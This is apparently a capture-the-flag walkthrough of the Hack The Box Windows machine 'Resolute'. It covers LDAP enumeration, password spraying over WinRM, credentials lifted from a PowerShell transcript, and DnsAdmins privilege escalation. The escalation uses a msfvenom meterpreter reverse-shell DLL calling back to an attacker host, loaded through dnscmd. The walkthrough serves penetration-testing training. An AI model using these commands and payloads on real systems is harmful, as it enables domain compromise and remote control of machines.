Enumeration

Like any other box, we must find out what ports are open.

nmap -sC -sV 10.10.10.169
Nmap scan report for 10.10.10.169
Host is up (0.073s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-12-18 00:54:42Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=12/17%Time=5DF976E4%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h48m20s, deviation: 4h37m10s, median: 8m18s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2019-12-17T16:55:05-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2019-12-18T00:55:02
|_  start_date: 2019-12-18T00:45:56

After seeing the results, we can tell that this is going to be a painful windows box! We got some great information from the scan though. Let’s dig more into those services.

My first go to is enum4linux

enum4linux -A 10.10.10.169 

We were able to find a list of users on the box. Which is great but now we need to see how we can find a password for any of these users.

We will enumerate LDAP to see if we can get more information.

Quick tip: if you run the ldap-search nse script you will be limited to only 20 objects. To get unlimited objects you have to use the ldap.maxobjects argument.
nmap -p 389 --script ldap-search --script-args ldap.maxobjects=-1 10.10.10.169

As you may have noticed, there is a lot of data to scroll through. If you want to save your eyes then grep whatever you are looking for. In our case ‘Password’

nmap -p 389 --script ldap-search --script-args ldap.maxobjects=-1 10.10.10.169 | grep --color=always -z 'Password'

We found a password for Marko but where can we use those credentials?

Rookie move on my part, I forgot to do a full port scan in the beginning.

nmap -p- 10.10.10.169

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 22:55 EDT
Nmap scan report for 10.10.10.169
Host is up (0.057s latency).
Not shown: 65512 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49682/tcp open  unknown
49710/tcp open  unknown

USER

We see port 5985 open which is WinRM. We can use that to get in using a tool called “evil-winrm”

evil-winrm -i 10.10.10.169 -u Marko -p Welcome123! -P 5985

Looks like those creds did not work.

Thoughts: The password looks like a common password given to employees when their accounts are created. The employees are supposed to change it as soon as they first log in, but do they always????

After trying almost every user on the list I got a hit! Ohhh melanie….

evil-winrm -i 10.10.10.169 -u melanie -p Welcome123! -P 5985

On to root!

So, the first step to root is to gain access to another user. This process is tedious because you have to search every directory to find the crumb.

After going through every directory, I found a hidden directory called “PSTranscripts”

In that directory there is a PS transcript file that might have something we want.

get-content PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************                                                                                            
Windows PowerShell transcript start                                                                               
Start time: 20191203063201                                                                                        
Username: MEGABANK\ryan                                                                                           
RunAs User: MEGABANK\ryan                                                                                         
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)                                                             
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding                                                  
Process ID: 2800                                                                                                  
PSVersion: 5.1.14393.2273                                                                                         
PSEdition: Desktop                                                                                                
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273                                                     
BuildVersion: 10.0.14393.2273                                                                                     
CLRVersion: 4.0.30319.42000                                                                                       
WSManStackVersion: 3.0                                                                                            
PSRemotingProtocolVersion: 2.3                                                                                    
SerializationVersion: 1.1.0.1                                                                                     
**********************                                                                                            
Command start time: 20191203063455                                                                                
**********************                                                                                            
PS>TerminatingError(): "System error."                                                                            
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"                                                      
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' '
,$((gi $pwd).Name),'> ')                                                                                          
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"                                            
>> CommandInvocation(Out-String): "Out-String"                                                                    
>> ParameterBinding(Out-String): name="Stream"; value="True"                                                      
**********************                                                                                            
Command start time: 20191203063455                                                                                
**********************                                                                                            
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "                
PS megabank\ryan@RESOLUTE Documents>                                                                              
**********************                                                                                            
Command start time: 20191203063515                                                                                
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4
cc123!

if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************

We found creds for ryan!

To login as Ryan we will use evil-winrm again

evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123! -P 5985

Let’s see what we can find out about ryan.

net user ryan /domain

He is part of the Contractors group. What permissions does that group have?

get-adgroupmember -identity dnsadmins 

Looks like ryan has dnsadmin permissions.

EXPLOIT

I found an article showing how to escalate privileges by doing a dll injection attack via the DNS service.

https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise

Let's see if that works!

First, we have to find the name of the dns server

dnscmd . /Info 

It is “Resolute.megabank.local”

Now, make the payload using msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=443 -f dll > pop.dll

Then, set up an smb server to host the dll payload

impacket-smbserver POP /root/htb/boxes/resolute_169/exploit

Go back to the box and use the dnscmd to use the dll that was created.

dnscmd Resolute.megabank.local /config /serverlevelplugindll \\POP\pop.dll

Set up a meterpreter handler to catch the shell

Now restart the dns service

Sc.exe \\Resolute.megabank.local stop dns
Sc.exe \\Resolute.megabank.local start dns

There you go, got a shell!

SUMMARY

This box was a pain!! Enumeration was key for this one, I lost count of how many times I overlooked things. The final exploit was great though, its not too often that I get to play with dll injections!